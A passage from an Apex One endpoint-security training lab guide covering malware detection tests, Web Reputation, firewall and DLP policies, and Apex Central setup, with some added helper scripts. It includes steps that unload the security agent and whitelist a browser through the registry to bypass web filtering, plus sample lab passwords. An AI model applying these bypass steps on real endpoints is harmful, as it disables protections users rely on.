http://detection.trend.local
6 Click the suspicious link and save the file to the desktop.

Note: Ignore any Windows messages related to the unknown application, if displayed.

7 Double-click the suspicious.exe file on the desktop and click Run.


8 In a moment, a Newly Encountered Program Detected message should be displayed. In this case,
the Census feature detects that this file has a low prevalence, and the Security Agent becomes
suspicious of the file. Do not click any of the options at this point, instead allow the Time out
value to expire.

9 Since the program was not allowed within the defined timeout, a second notification will appear
in a moment displaying that the threat was blocked through Malicious Behavior Detection.


10 Click the number 1 next to Malicious Behavior Detections to open the Log viewer.

11 Click Close once you have examined the details of the detection. Close the Threats/Violations
Found alert.
12 Return to the VM-DC2016 virtual machine and in the Apex One Web Management console, locate
the CLIENT-02 computer in the Agent list.
13 Right-mouse click the computer and click Logs > Behavior Monitoring Logs. Accept the default
criteria and click Display Logs.

14 The details of the event generated by behavior monitoring will be displayed.

Click Close.

Note: It may take a few minutes for the Security Agent to forward its logs to the Apex One Server. If the
log entry does not display, try again in a couple of minutes.



Lab 8: Protecting Endpoint Computers From Unknown Threats
In this lab, participants will enable Predictive Machine Learning and sample malware will be accessed to
trigger protection. In addition, an unknown application will be accessed to trigger Malicious Behavior
Detection.

Estimated time to complete this lab: 10 minutes

Exercise 1: Enable Predictive Machine Learning


1 On the VM-DC2016 virtual machine, open the Apex One Web Management console.
2 In the Agent Management list, right-mouse click CLIENT-02 and click Settings > Predictive
Machine Learning Settings. Ensure that Enable Predictive Machine Learning is selected and
ensure that only the Type of File is enabled. Click Save.


3 A message is displayed confirming the configuration settings have been applied. Click Close.

4 In the virtual application, click the VM-CLIENT-02 image. Return to the Detections demo site.
5 Click trendx_detect to download a malware sample.

6 Do not run or save the file. After a moment, a Threats/Violations Found notification should be
displayed.

7 Click Cancel on the download message.


8 Click the number link next to Unknown Threats to display additional information regarding the
threat, including that Predictive Machine Learning caught the potential malware.

9 Click Close in the Logs window. Close the Threats/Violations Found alert.
10 Return to the VM-DC2016 image and log into the Apex One Web Management console. Locate
and right-mouse click CLIENT-02. Click Logs > Predictive Machine Learning Logs. Accept the
default criteria and click Display Logs.

11 Examine the details related to this violation. It may take a few minutes for the log event to
display.


12 Click View on the far right side to obtain additional information about the file detection.

13 Click Close when done.



Lab 9: Blocking Web Threats
In this lab, participants will configure Web Reputation and sample Web sites will be accessed.

Estimated time to complete this lab: 15 minutes

Exercise 1: Enable Web Reputation


1 In the VM-DC2016 image, open the Apex One Web Management console.
2 In the Agent Management list, right-click the Classroom domain. Click Settings > Web Reputation
Settings.

Note: Ensure that only the Classroom domain is selected when applying these settings. If an Agent in
the domain is selected in the Agent list when right-mouse clicking the Classroom domain, the
settings will only apply to that Agent.

3 On the Internal Agents tab, confirm that Web Reputation is enabled for Windows desktops and
set the Security Level for these agents to Medium.
In addition, disable Send queries to Smart Protection Servers. This will ensure that the requests
are sent to the Smart Protection Network. Leave all other settings at their defaults and click
Save.


4 A confirmation will be displayed to inform that the configuration changes have been applied.
Click Close.

5 In the virtual application, open the VM-CLIENT-03 virtual machine.


6 On the Windows 10 computer, open Internet Explorer. A message regarding add-ons will be
displayed in the browser.


7 Click Choose add-ons. In the list, click to Enable All to enable the Trend Micro add-ons and click
Done.

8 In Internet Explorer, access the sample web sites listed below and note what happens when you
attempt to access each of these sites:
• wrs81.winshipway.com
• wrs71.winshipway.com
• wrs31.winshipway.com
Sites with a score of 65 or lower should be blocked (since Medium level is set) and the Web
browser will display the following message.


In addition, a Malicious URLs alert should be displayed.

9 Click the number next to Malicious URLs to open the Web Reputation Logs. Note the entries for
the blocked Web site, then click Close. Close the Threats/Violations Found alert.

10 Navigate to the following folder and locate the OfcUrlf.log file:


…\Security Agent\Misc
11 Open the file in Notepad and locate the details for which websites were blocked.

12 In Internet Explorer, clear the browsing history and close the browser.


Exercise 2: Add an Application to the Web Reputation Whitelist

In this exercise, participants will configure Web Reputation to ignore requests made by specific
applications. In this example, Internet Explorer will be added to the Whitelist.
1 Still on the VM-CLIENT-03 image, right-click the Security Agent icon in the system tray and click
Unload Security Agent.

2 When prompted, type the unload password entered during setup of the Apex One Server, for
example, trendmicro. Wait for the Agent icon to disappear from the system tray before
continuing.

3 Open the Registry Editor (regedit) and locate the following entry:
[HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\Osprey\WhiteList]
4 Right-mouse click Whitelist and click New > Key. Create a new key called Internet Explorer.

Note: Agent Self-Protection prevents any modification to the Apex One Registry keys. If the Security
Agent is not completely unloaded, you may be prevented from creating this new key. If an error is
displayed when trying to create the key, try again after a couple of minutes to allow the Agent to
finish the unloading process.

5 Right-mouse click Internet Explorer and click New > String Value. Type the Value name of
ProcessImageName.
6 Right-mouse click ProcessImageName and click Modify. Type the Value data of iexplore.exe.


Note: Ensure that the name of the Value data is iexplore.exe (not iexplorer.exe)

7 Close the Registry Editor and restart the Security Agent by clicking Start > Trend Micro Apex One
Security Agent > Security Agent. Wait for the agent icon to appear in the system tray before
continuing.
8 Open the Chrome browser and enter the following URL:
http://wrs31.winshipway.com
The connection should be blocked.
9 Open Internet Explorer and enter the same URL. The connection should be allowed as Internet
Explorer is on the whitelist.

Exercise 3: Protect Endpoint Computers From Browser Exploits

In this exercise, malware scanning, web reputation and memory scans will be combined to protect the
endpoint computers from known browser exploits.
1 Return to the VM-DC2016 virtual image and in the Agent Management list, right-mouse click the
Classroom domain, and click Settings > Additional Service Settings.

2 As the memory scan feature requires Behavior Monitoring to be enabled, confirm that
Unauthorized Change Prevention Service is enabled for Windows desktops, along with the
Advanced Protection Service section.


By default, this service should be enabled. This is the Common Control Solution Framework.

Click Save.
3 A confirmation of the configuration change is displayed. Click Close.

4 Right-mouse click the Classroom domain again, this time click Settings > Web Reputation
Settings.


5 On the Internal Agents tab, scroll to locate the Browser Exploit Prevention section and ensure
that Block pages containing malicious scripts is enabled.

Click Save.
6 A confirmation of the Web Reputation configuration change is displayed. Click Close.


7 Open the VM-CLIENT-02 virtual machine. On the Windows 10 desktop, open the Internet Explorer
browser. Click Tools and confirm that the Trend Micro add-ons are present in Internet Explorer
by navigating to Manage add-ons. Under Toolbars and Extensions the add-ons should appear. If
not already enabled (completed in a previous lab), select each add-on and click Enable.

8 In Internet Explorer, type the following URL to access some sample Web pages:
• http://192.168.4.1/CVE-2009-1568.htm
• http://192.168.4.1/CVE-2009-1569.htm
• http://192.168.4.1/CVE-2009-3867.htm
• http://192.168.4.1/CVE-2009-3869.htm
Since these pages contain malicious scripts, a policy violation message should be displayed.


9 Click the number link next to Malicious URLs (this number may vary) to display the log entries for
these page accesses. Set the time range to Last 24 hours. Further details on each violation are
displayed. Click Close once you have noted the details. Close the Threats/Violations Found alert.

10 Return to the VM-DC2016 virtual machine and in the Apex One Web Management console, locate
the CLIENT-02 computer in the Agent list.
11 Right-mouse click the computer and click Logs > Web Reputation Logs. Accept the default criteria
and click Display Logs.

12 The details of the events generated by the accesses to Web pages containing the malicious
scripts will be displayed.

Click Close.



Lab 10: Protecting Endpoint Computers Through Traffic Filtering
In this lab, participants will create a new firewall policy and profile to block Internet connections from an
endpoint computer.

Estimated time to complete this lab: 15 minutes

Exercise 1: Enable the Firewall Service


In this exercise, Firewall services will be enabled for a domain.
1 Open the VM-DC2016 virtual machine and log into the Apex One Web Management console.
2 In the Agent Management list, right-click the Classroom domain. Click Settings > Additional
Service Settings.


3 Ensure that the Firewall Service is enabled for Windows desktop computers.

Note: Firewall services were enabled during the setup of Apex One on the virtual machine.

4 Click Save to apply the settings to the domain.


5 A confirmation will be displayed to inform you that the configuration changes have been applied.
Click Close.

Exercise 2: Create a Firewall Policy


In this exercise, a new policy will be created to block Web traffic.


1 Still in the Apex One Web Management console, click Agents > Firewall > Policies. The list of
default Firewall policies is displayed.

2 Click Add and create a policy to allow all traffic through the Apex One firewall with the following
details:
• Name: Exercise Firewall Policy
• Security level: Low
• Enable Firewall: Ensure this Firewall Feature item is enabled
• Display a notification when a Firewall violation is detected: enabled

3 In the Exception pane, click Add and create an exception to block Web traffic with the following
details.
• Name: Block HTTP and HTTPS
• Application: All applications
• Action: Deny network traffic
• Direction: Inbound and Outbound enabled
• Protocol: TCP
• Specific Ports: 80,443
• IP address(es): All IP addresses


Click Save.
4 The new Exception is displayed. Click the up arrow in the Order column multiple times to move
the new exception above the default HTTP and HTTPS exceptions.

Click Save.


5 The new policy is displayed in the list.
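To make the ordering point in step 4 concrete, here is an added Python model (not Trend Micro code) of how exceptions in a policy like the one above are evaluated. It assumes that exceptions are checked top to bottom with the first match winning, that the default HTTP and HTTPS exceptions are outbound allow rules, and that the Low security level allows traffic no exception matches; all connections are constructed sample data.

```python
"""Added example: a first-match model of Apex One style firewall policy
exceptions.  Not Trend Micro code; the evaluation order, the security-level
defaults and the default HTTP/HTTPS exceptions are assumptions of this model."""
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional, Tuple

ALL_DIRECTIONS = frozenset({"inbound", "outbound"})


@dataclass(frozen=True)
class Connection:
    """One flow as the agent firewall would see it (constructed sample data)."""
    direction: str   # "inbound" or "outbound"
    protocol: str    # "TCP" or "UDP"
    port: int        # remote port for outbound, local port for inbound
    remote_ip: str


@dataclass(frozen=True)
class FirewallException:
    """Mirrors the fields filled in under Exception > Add in step 3."""
    name: str
    action: str                                    # "allow" or "deny"
    directions: FrozenSet[str]                     # subset of ALL_DIRECTIONS
    protocol: str                                  # "TCP", "UDP" or "ALL"
    ports: Optional[FrozenSet[int]] = None         # None means all ports
    ip_addresses: Optional[FrozenSet[str]] = None  # None means all IP addresses

    def matches(self, conn: Connection) -> bool:
        if conn.direction not in self.directions:
            return False
        if self.protocol != "ALL" and self.protocol != conn.protocol:
            return False
        if self.ports is not None and conn.port not in self.ports:
            return False
        if self.ip_addresses is not None and conn.remote_ip not in self.ip_addresses:
            return False
        return True


# Assumed meaning of the policy security levels for traffic no exception matches.
LEVEL_DEFAULTS: Dict[str, Dict[str, str]] = {
    "Low": {"inbound": "allow", "outbound": "allow"},
    "Medium": {"inbound": "deny", "outbound": "allow"},
    "High": {"inbound": "deny", "outbound": "deny"},
}


@dataclass
class FirewallPolicy:
    name: str
    security_level: str
    exceptions: List[FirewallException]

    def decide(self, conn: Connection) -> Tuple[str, str]:
        """Return (action, reason).  Exceptions are checked top to bottom and the
        first match wins, which is why the Order column matters in step 4."""
        for exc in self.exceptions:
            if exc.matches(conn):
                return exc.action, exc.name
        default = LEVEL_DEFAULTS[self.security_level][conn.direction]
        return default, f"security level {self.security_level}"

    def move_up(self, name: str, steps: int = 1) -> None:
        """The Order column's up arrow: move one exception `steps` rows up."""
        idx = next(i for i, exc in enumerate(self.exceptions) if exc.name == name)
        exc = self.exceptions.pop(idx)
        self.exceptions.insert(max(0, idx - steps), exc)


def exercise_policy() -> FirewallPolicy:
    """The policy from Exercise 2 as it looks right after step 3: the new
    exception sits below the (assumed) default outbound allow exceptions."""
    default_http = FirewallException("HTTP", "allow", frozenset({"outbound"}), "TCP", frozenset({80}))
    default_https = FirewallException("HTTPS", "allow", frozenset({"outbound"}), "TCP", frozenset({443}))
    block_web = FirewallException("Block HTTP and HTTPS", "deny", ALL_DIRECTIONS, "TCP",
                                  frozenset({80, 443}))
    return FirewallPolicy("Exercise Firewall Policy", "Low", [default_http, default_https, block_web])


# Constructed sample flows (documentation-range addresses, not lab hosts).
WEB_OUT = Connection("outbound", "TCP", 443, "203.0.113.10")
SSH_OUT = Connection("outbound", "TCP", 22, "203.0.113.10")
WEB_IN = Connection("inbound", "TCP", 80, "198.51.100.5")


def demo() -> Dict[str, Tuple[str, str]]:
    """Decisions before and after the reorder in step 4."""
    policy = exercise_policy()
    before = policy.decide(WEB_OUT)                 # default HTTPS allow matches first
    policy.move_up("Block HTTP and HTTPS", steps=2)  # step 4: up arrow, twice in this model
    after = policy.decide(WEB_OUT)
    return {"before": before, "after": after,
            "ssh": policy.decide(SSH_OUT), "inbound80": policy.decide(WEB_IN)}


if __name__ == "__main__":
    for label, (action, reason) in demo().items():
        print(f"{label:>9}: {action:5} ({reason})")
```

Note that inbound port 80 is denied even before the reorder, because the default exceptions only cover outbound traffic; the reorder is what makes the block win for the outbound browsing tested in Exercise 4.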

Exercise 3: Create a Firewall Profile


In this exercise, a new firewall profile will be created, allowing the new policy to be applied to Agents.
1 Still in the Apex One Web Management console, click Agents > Firewall > Profiles. The list of
default profiles is displayed.

2 Click Add to create a new profile with the following details:


• Enable this profile: ensure this profile is enabled
• Name: Blocked Agent
• Description: Type an optional description
• Policy: Select Exercise Firewall Policy
• Endpoint: Click to enable Endpoint, then click Select Endpoints from the Agent Tree. Locate
the CLIENT-02 endpoint from the Classroom domain. Click Select.
Click Save.


3 Click Apply Profile to Agents.


A banner is displayed in the console advising you that the Security Agents are being notified of
the new settings.

Exercise 4: Verify the Firewall Deployment


In this exercise, the Agent list will be viewed to confirm the deployment of the Firewall components.
1 Still in the Apex One Web Management console, click Agents > Agent Management. Click the
Classroom domain to view its Agents.


2 Click Firewall view from the Agent tree view list.

3 Confirm there is a green check mark in the Firewall column for CLIENT-02.

4 In the vApp, open the VM-CLIENT-02 virtual image.


5 Double-click the Apex One icon in the Windows system tray to open the console. Click Settings at
the bottom of the console window. On the Protection tab, click Firewall from the list. Note the
name of the policy in effect on this endpoint.

Click Cancel to close the Settings window.


6 Still on the CLIENT-02 computer, open the Windows Command Prompt as an administrator and
navigate to the following folder:
C:\Program Files (x86)\Trend Micro\Security Agent

Note: The Command Prompt shortcut on the toolbar launches with administrator permissions. If
launching Command Prompt from the Windows menu, right-mouse click the item and click More
> Run as administrator.

7 Type the following command to generate a dump file of the firewall rules in effect on this
endpoint computer:
tmpfw dump
8 In Windows Explorer, locate and open the resulting dump file called !PfwDump.txt in the
following folder:
...\Security Agent


9 Open the file in Notepad. Locate the entries for the exceptions to block ports 80 and 443.

10 On the Windows 10 desktop, open a web browser and browse to a random web site. The site
should be blocked. After a moment, a firewall violation notification message should be displayed
on the agent endpoint.


11 Click the number next to Firewall Violations or Network Viruses to view logging details regarding
the firewall violation.

12 Return to the VM-DC2016 image and in the Apex One Web Management console, locate and right-
mouse click CLIENT-02. Click Logs > Firewall Logs. Accept the default criteria and click Display
Logs.

13 Examine the details related to this violation. It may take a few minutes for the log event to
display, then click Close.

Exercise 5: Disable the Firewall Policy


In this exercise, the firewall policy blocking access to HTTP and HTTPS will be deleted so as not to impact
the Agent’s access to the Internet.
1 Return to the Apex One Web Management console and click Agents > Firewall > Profiles. The list of
current profiles is displayed.


2 Click to select the Blocked Agent profile and click Delete.

3 Click Apply Profiles to Agents.


4 A message is displayed advising you that the Security Agents are being notified of the new
settings.

5 After a moment, return to the VM-CLIENT-02 virtual machine and attempt to browse to a random
Web site. The site should be displayed.



Lab 11: Preventing Data Loss
In this lab, participants will enable Apex One Data Protection and configure it to block specific data from
leaving the endpoint computer.

Estimated time to complete this lab: 20 minutes

Exercise 1: Install the Data Protection Plug-In


1 Open the VM-DC2016 image, and log into the Apex One Server Web Management console.
2 Click Plug-ins and in the Apex One Data Protection section, click Download. Click OK to proceed
with the download when prompted.

A progress bar is displayed as the plug-in is downloaded.


3 When the download is complete, click Install Now.

4 When prompted, click Agree to accept the license agreement.

5 In the Apex One Data Protection section, click Manage Program.


6 Provide an Activation Code for the Apex One Data Protection plug-in. An Activation Code is
located in the Product Cloud activation code.txt file in the Lab Files folder on the
Windows Server 2016 desktop. Copy and paste the activation code into the Web form and click
Save.

7 The Apex One Data Protection page is displayed.


8 In the Web Management console, a new Data Loss Prevention menu item should now appear
under the Agents menu.

Exercise 2: Configure Data Identifiers


Now that Apex One Data Protection has been activated, participants will begin by configuring a new Data
Identifier.
1 In the Apex One Server Web Management console, click Agents > Data Loss Prevention > Data
Identifiers.
2 In the Data Identifiers window, click the Keyword Lists tab and click Add.

3 In the Properties section, configure the following settings:
• Name: Jack Taylor
• Criteria: Combined score for keywords exceeds threshold
• Score Threshold: 9

4 In the Keywords section, add the following words and assign the listed scores. Click Add after
each one to append the word to the list. Leave Case sensitive disabled for each keyword.

Keyword        Score
contract       3
Taylor         2
confidential   5

With these scores, only a document containing all three keywords reaches a combined score (10) that
exceeds the threshold of 9; any two of them total at most 8.

5 The Keywords List will display the custom keywords and their corresponding score.

Click Save.
6 A success message is displayed. Click Close.
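The following PowerShell function is an added example, not part of this courseware, that models the Combined score for keywords exceeds threshold criterion so a keyword list can be checked against sample text before it is deployed. It assumes that each keyword contributes its score once however often it appears, that keywords match whole words only, and that matching ignores case when Case sensitive is disabled; the product's own matcher may differ, so treat the output as a sanity check of the list, not as a prediction of what the agent will do. The sample texts are constructed for the example.

```powershell
# Added example, not part of the Apex One courseware: a local model of the
# "Combined score for keywords exceeds threshold" criterion, for checking a
# keyword list against sample text before it is deployed.
# Assumptions (the product's own matcher may differ):
#   - each keyword contributes its score once, however often it occurs;
#   - keywords match whole words only (regex \b);
#   - matching ignores case unless -CaseSensitive is given.

function Test-DlpKeywordList {
    param(
        [Parameter(Mandatory)][string]$Text,
        [Parameter(Mandatory)][hashtable]$Keywords,   # keyword -> score
        [Parameter(Mandatory)][int]$Threshold,
        [switch]$CaseSensitive
    )
    $options = if ($CaseSensitive) {
        [System.Text.RegularExpressions.RegexOptions]::None
    } else {
        [System.Text.RegularExpressions.RegexOptions]::IgnoreCase
    }
    $matched = @()
    $score   = 0
    foreach ($word in $Keywords.Keys) {
        $pattern = '\b' + [regex]::Escape($word) + '\b'
        if ([regex]::IsMatch($Text, $pattern, $options)) {
            $matched += $word
            $score   += [int]$Keywords[$word]
        }
    }
    [pscustomobject]@{
        Score     = $score
        Threshold = $Threshold
        Violation = ($score -gt $Threshold)      # "exceeds" = strictly greater than
        Matched   = (($matched | Sort-Object) -join ', ')
        Text      = $Text
    }
}

# The Jack Taylor keyword list from Exercise 2: 3 + 2 + 5 = 10, threshold 9.
$jackTaylor = @{ contract = 3; Taylor = 2; confidential = 5 }

# Constructed sample texts (not the lab's test document).
$samples = @(
    'CONFIDENTIAL: draft contract for Mr Taylor, do not forward.'  # all three words: 10, violation
    'Confidential contract, internal distribution only.'           # 8, below threshold
    'Taylor contract contract contract'                            # repeats do not add up: 5
    'Taylors confidential contract'                                # "Taylors" is not the whole word: 8
)

$results = foreach ($s in $samples) {
    Test-DlpKeywordList -Text $s -Keywords $jackTaylor -Threshold 9
}
$results | Format-Table Score, Threshold, Violation, Matched -AutoSize
```

Only the first sample reports a violation, which is why a document must carry all three keywords before this list fires. If the agent behaves differently on the same text (for example, if it counts every occurrence), adjust the model to match and re-check the threshold before rolling the identifier out.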

Exercise 3: Configure a Data Loss Prevention Template


In this exercise, a Data Loss Prevention template will be configured.
1 Click Agents > Data Loss Prevention > DLP Templates.

2 In the Data Loss Prevention Templates window, click Add.

3 Complete the Properties section in the Data Loss Prevention Templates window as follows:
• Name: Confidential Contracts
• Available data identifiers: search for Jack Taylor. Click to select it and click >> to add it to
the Selected data identifiers list.
Click Save.

4 A notification is displayed once the settings are successfully changed. Click Close.

5 Verify that the new Confidential Contracts template has been added to the list of available
templates.

Exercise 4: Deploy a New Data Loss Prevention Policy


In this exercise, participants will create and deploy a new Data Loss Prevention policy.
1 In the Agent Management list, right-click the Classroom domain. Click Settings > DLP Settings.

2 A message is displayed alerting you that the Data Protection module has not been deployed to
the Agents. Click OK to deploy this component to the computers in this group.

3 In the Data Loss Prevention Configurations window, click the policies link.

4 In the Data Loss Prevention Policy Settings window, click Enable Data Loss Prevention. On the
Rules tab, click Add.

5 Verify that Enable this rule is selected. Type a name for the rule, such as Confidential
current contracts.
6 From the Template tab, search for the HIPAA template. Click to select it and click Add > to move it
to the Selected Templates column.

7 Repeat this step for the newly created Confidential Contracts Template.

Click Next.

8 On the Channel tab, click to enable Network Channels, which selects all channels in the list. Click
All transmissions under Transmission Scope, and click to enable all System and Application
Channels. Click Next.

9 On the Action tab, set Action to Block. Click to enable the Additional actions of Notify the agent
user and User Justification.

Click Save.

10 In the Data Loss Prevention Policy Settings, make sure the new rule has been added and is
enabled. Click Save, and apply the settings to the agents.

11 A confirmation is displayed indicating that the configuration changes have been applied.
Click Close.

12 Access the VM-CLIENT-02 virtual machine. A pop-up notification is displayed on the client
computer requesting a restart of the machine.
Click Restart.

Note: It may take several minutes for the Data Loss Prevention components to be deployed. You can
accelerate the deployment in the classroom by double-clicking the Security Agent icon in the
system tray and clicking Update Now.

13 Once the computer has restarted, open a connection to a shared folder on the CLIENT-03
computer by clicking Run on the taskbar and typing the following path:
\\192.168.4.6\c$
14 Locate the Data Leak Prevention Test Document.txt file on the desktop of the
CLIENT-02 computer and drag the file into the shared folder window opened for CLIENT-03.

Note: Do not try to copy it to an Apex One Server share, as this channel (Agent > Server) is not
monitored.

15 When the User Justification message appears, select Yes and choose a reason. Click OK.

16 A Data Loss Prevention Violation message is displayed. Click Close.

17 Return to the VM-DC2016 image and log into the Apex One Web Management console. Locate
and right-click CLIENT-02. Click Logs > DLP Logs. Accept the default criteria and click
Display Logs.

18 Examine the details related to this violation. It may take a few minutes for the log event to
display.

Click Details on the far right side to obtain additional information. Click Close when done.

Exercise 5: Modify Justification Reasons


In this exercise, the justification reasons presented to the user when the policy is triggered will be
modified.
1 Still on the Apex One Server, locate and open the ofcscan.ini file in the following folder:
...\PCCSRV
2 In the [Global Setting] section, locate the following entries for the options listed for User
Justification.
• DlpUserJustificationItem0=
• DlpUserJustificationItem1=
• DlpUserJustificationItem2=

3 Modify the entries as needed and save the changes. The changes will be applied the next time
the Apex One Server is restarted.

Note: Do not modify DlpUserJustificationItem3= if you would like an option called Other: to
appear in the User Justification list.
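The following PowerShell script is an added example, not part of this courseware, of making the ofcscan.ini change above without disturbing other keys or sections: it backs the file up, rewrites only DlpUserJustificationItem0 to DlpUserJustificationItem2 inside [Global Setting], and leaves DlpUserJustificationItem3 alone so that the Other: option survives. The install path and the reason strings are assumptions to adjust for your server; the fragment it runs against first is constructed so the logic can be checked without the real file.

```powershell
# Added example, not part of the Apex One courseware: rewrite the three DLP
# user-justification keys inside [Global Setting] and nothing else.
# Assumptions: $IniPath is the default server install location (adjust for your
# site), the file is ANSI/UTF-8 text with key=value lines, and the reason
# strings are placeholders. DlpUserJustificationItem3 is deliberately untouched.

function Set-IniValue {
    param(
        [Parameter(Mandatory)][string[]]$Lines,    # file contents, one element per line
        [Parameter(Mandatory)][string]$Section,
        [Parameter(Mandatory)][string]$Key,
        [Parameter(Mandatory)][string]$Value
    )
    $inSection = $false
    $updated   = $false
    $out = @(foreach ($line in $Lines) {
        if ($line -match '^\s*\[(.+?)\]\s*$') {
            # Leaving the target section without having seen the key: add it first.
            if ($inSection -and -not $updated) { "$Key=$Value"; $updated = $true }
            $inSection = ($Matches[1] -eq $Section)
            $line
        }
        elseif ($inSection -and $line -match ('^\s*' + [regex]::Escape($Key) + '\s*=')) {
            "$Key=$Value"                       # replace the existing value in place
            $updated = $true
        }
        else {
            $line
        }
    })
    if (-not $updated) {
        if (-not $inSection) { throw "Section [$Section] not found" }
        $out += "$Key=$Value"                    # target section was the last one in the file
    }
    return $out
}

$reasons = [ordered]@{
    DlpUserJustificationItem0 = 'Approved by my manager'             # placeholder text
    DlpUserJustificationItem1 = 'Required for a customer engagement' # placeholder text
    DlpUserJustificationItem2 = 'Recipient is an authorized partner' # placeholder text
}

# Dry run against a constructed fragment so the logic can be checked without the real file.
$fragment = @(
    '[Global Setting]'
    'DlpUserJustificationItem0='
    'DlpUserJustificationItem1='
    'DlpUserJustificationItem2='
    'DlpUserJustificationItem3='
    '[Constructed Section]'          # made-up section name, not from the product
    'UnrelatedKey=1'
)
$lines = $fragment
foreach ($k in $reasons.Keys) {
    $lines = Set-IniValue -Lines $lines -Section 'Global Setting' -Key $k -Value $reasons[$k]
}
$lines   # Item0-2 now carry the reasons; Item3 and the other section are unchanged

# Real file: back it up, apply the same edit, then restart the Apex One server as the lab notes.
$IniPath = Join-Path ${env:ProgramFiles(x86)} 'Trend Micro\Apex One\PCCSRV\ofcscan.ini'  # assumed default path
if (Test-Path -LiteralPath $IniPath) {
    Copy-Item -LiteralPath $IniPath -Destination "$IniPath.$(Get-Date -Format yyyyMMddHHmmss).bak"
    $lines = Get-Content -LiteralPath $IniPath
    foreach ($k in $reasons.Keys) {
        $lines = Set-IniValue -Lines $lines -Section 'Global Setting' -Key $k -Value $reasons[$k]
    }
    Set-Content -LiteralPath $IniPath -Value $lines   # Windows PowerShell writes ANSI, matching the original
}
```

Compare the backup with the rewritten file before restarting the server; the only differences should be the three justification lines.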


Lab 12: Managing Policies Through Apex Central
In this lab, participants will configure and deploy an Apex One policy through Apex Central.

Estimated time to complete this lab: 20 minutes

Exercise 1: Integrate Apex Central and Apex One


Before policies can be deployed through Apex Central, communication between Apex One and Apex
Central must be configured.
1 On the VM-WIN2012 image, locate the digital certificate created during the setup of the Apex
Central Server. The certificate file is called TMCM_CA_Cert.pem and is located in the following
folder:
C:\Program Files (x86)\Trend Micro\Control Manager\Certificate\CA\
Copy this file to the Lab Files folder.
2 On the VM-DC2016 image, log into the Apex One Web Management console and click
Administration > Settings > Apex Central.
3 In the Apex Central Settings window, the Connection Status should be displayed as Not
connected.
Complete the details of the Apex Central Server as follows:

• Entity display name: ApexOne
• Server FQDN or IP address: 192.168.4.3
• Port: Accept the default port of 443
• Apex Central Certificate: Click Browse and locate the TMCM_CA_Cert.pem certificate file in
the Lab Files folder.
4 Click Test connection. A message indicating that the connection was successful should be
displayed. Click OK.

5 Click Register. The connection status is updated.
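The following PowerShell function is an added example, not part of this courseware, for inspecting TMCM_CA_Cert.pem before it is uploaded to Apex One: it decodes the PEM body, reports whether the certificate is self-signed and flagged as a CA, checks the validity dates, and prints the SHA-1 and SHA-256 fingerprints, which you can record and compare against the certificate Apex Central presents on port 443. Only the file location (the Lab Files folder on the desktop) is assumed.

```powershell
# Added example, not part of the Apex One courseware: inspect the Apex Central
# CA certificate before uploading it, and record its fingerprints.
# Assumption: the file is in the Lab Files folder on the desktop, as in the lab.

function Get-PemCertificateInfo {
    param([Parameter(Mandatory)][string]$Path)
    $text = Get-Content -LiteralPath $Path -Raw
    # Take the first CERTIFICATE block and decode its Base64 body to DER.
    $pem = '-----BEGIN CERTIFICATE-----\s*([A-Za-z0-9+/=\r\n]+?)\s*-----END CERTIFICATE-----'
    if ($text -notmatch $pem) { throw "No PEM certificate found in $Path" }
    $der  = [Convert]::FromBase64String(($Matches[1] -replace '\s', ''))
    $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList (,$der)

    $basic = $cert.Extensions |
        Where-Object { $_ -is [System.Security.Cryptography.X509Certificates.X509BasicConstraintsExtension] }
    $sha256 = [System.Security.Cryptography.SHA256]::Create().ComputeHash($cert.RawData)

    [pscustomobject]@{
        Subject    = $cert.Subject
        Issuer     = $cert.Issuer
        SelfSigned = ($cert.Subject -eq $cert.Issuer)     # expected for a private CA root
        IsCA       = [bool]($basic -and $basic.CertificateAuthority)
        NotBefore  = $cert.NotBefore
        NotAfter   = $cert.NotAfter
        Expired    = ($cert.NotAfter -lt (Get-Date))
        SHA1       = $cert.Thumbprint
        SHA256     = ([BitConverter]::ToString($sha256) -replace '-', '')
    }
}

$certFile = Join-Path ([Environment]::GetFolderPath('Desktop')) 'Lab Files\TMCM_CA_Cert.pem'
Get-PemCertificateInfo -Path $certFile | Format-List
```

If SelfSigned or IsCA comes back False, the file is probably a server certificate rather than the CA certificate, and the registration will trust the wrong thing; check the folder the lab names before continuing.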

Exercise 2: Create an Apex Central User Account


In this exercise, an Apex Central administrator account will be created in Apex One.
1 Still in the Apex One Web Management console, click Administration > Account Management >
User Accounts.
2 Click Add to create a new account. Complete the details for the account as follows:

• Select Role: Select Administrator (Built-in) from the list
• User name: Admin (the name of the Apex Central administrator, created during installation)
• Description: Apex Central Administrator
• Password: Pa$$w0rd (using the zero) (the password of the Apex Central administrator,
assigned during installation)
Click Next.
3 Define the Agent Tree Scope to identify the branches of the Agent Tree this administrator will
have control over. The top branch, Apex One Server, is selected by default. Click Next.

4 To enable the Apex One items that the Apex Central account will have permissions to control,
click the Apex One Server at the top of the Agent Tree Scope list and click Finish.

5 The new user account is displayed.

Exercise 3: Confirm Registration


In this exercise, participants will confirm the integration of Apex One and Apex Central by attempting
single sign-on into Apex One.
1 Log into the Apex Central Web Management console by clicking the bookmark in the Internet
Explorer or Chrome browser. Log in with the following credentials:
• User name: Admin
• Password: Pa$$w0rd (with zero, not the letter O)
2 Click Administration > Managed Servers > Server Registration. In the Server Type list, click All.

3 Apex One should be listed as a Registered Server. Click the link with the URL.
4 You should be redirected to the Apex One Web Management console. Since the account for the
Apex Central administrator was assigned the Administrator (Built-in) role, they will be logged into
Apex One with full access to the Web Management console through single sign-on.

Exercise 4: Add Apex One to the Product Directory


In this exercise, the Apex One Server will be added to the Product Directories list.
1 Still in the Apex Central Web Management console, click Directories > Products and click
Directory Management.

2 Click Local Folder, and click Add Folder.

3 Type a name for a new folder (or directory), for example, Trend Micro Servers and click
Save.

Click OK to confirm the creation of the new directory.


4 Expand the New Entity folder. Drag the Apex One Server device (listed as ApexOne) from the
New Entity folder to the newly created Trend Micro Servers folder.

When prompted, click OK to acknowledge the move.

5 The Apex One Server should now be displayed in the Trend Micro Servers folder.

Exercise 5: Configure a Policy Template


In this exercise, a policy template will be configured to identify the target endpoints receiving the policy
details as well as the settings to be deployed to the Security Agents on those endpoints.
1 Still in the Apex Central Web Management console, click Policies > Policy Management. Click
Close to hide the information window that is displayed.

2 In the Product list, select Apex One Security Agent. To create a policy for this product, click
Create or Create one now.

3 The policy template window is displayed. From this window, administrators will select the target
endpoints and identify the policy settings to be deployed.

4 Type a name for the policy, for example, No Scan.


5 Click to enable Specify Target and click Select.

